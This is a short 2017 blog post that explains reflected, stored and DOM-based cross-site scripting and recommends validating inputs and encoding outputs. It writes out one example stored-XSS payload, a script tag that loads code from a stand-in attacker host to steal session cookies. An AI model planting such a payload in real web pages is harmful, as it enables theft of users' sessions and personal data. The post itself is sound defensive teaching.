Beware of Cross Site Scripting (XSS) attacks
- August 15, 2017
There are two main types of cross site scripting attacks, Reflected XSS and Stored XSS.
Reflected XSS attacks, also known as non-persistent attacks occur when a malicious script is reflected off a web application onto the victim’s browser. If you are a familiar with hacking incidents, you might have heard about phishing. Reflected XSS is somewhat similar to phishing. XSS is involved in linking to an external script which may retrieve cookies from the victim’s browser. Here the malicious script is embedded into that link. These are the most common XSS attacks. Often these come as emails because when more people receive the link and click on it, the attacker gets more victims.
An attacker can identify if your web page is vulnerable by adding a simple malicious script to your page URL which thereby creates his/her own URL.
Stored cross site scripting on the other hand does not involve embedding a link, but adding a malicious script into a web application and its server. As explained in the comment field, a hacker can inject a separate script from a harmful site through a comment like this,
<script src=”http://hackersite.com/harmfulScript.js”> </script>.
Every time a user tries to access the page the html tag in the comment field will activate a script from a separate harmful site. This malicious script might be capable of stealing session cookies of the user and getting easy access to his/her personal and sensitive information.
Apart from the above two main types, Document Object Model (DOM) based XSS attacks also exist. DOM based XSS attacking scripts are executed by modifying the DOM in the victim’s browser used by the original client-side script of the page.
How do you avoid XSS attacks?
If your application fails to properly validate inputs, fails to encode outputs and relies on data from shared databases, then there might be a risk of vulnerabilities to XSS attackers. Therefore, to secure your web application from XSS injections it is better to validate all inputs and encode all outputs.
Wrapping up, XSS can be identified as a common type of computer security vulnerability which affects not only the users of your application but you as well. A person might think XSS is not his/her problem and that it is a problem for the users of the application, but if your web page seems to be vulnerable to your users, how do you give them enough reassurance to visit your page and who will take that risk of visiting it? So be careful! You might need to think twice about the security side of your application. Cheers!!
Want to read more from Uchitha? Check out her blog posts on Medium!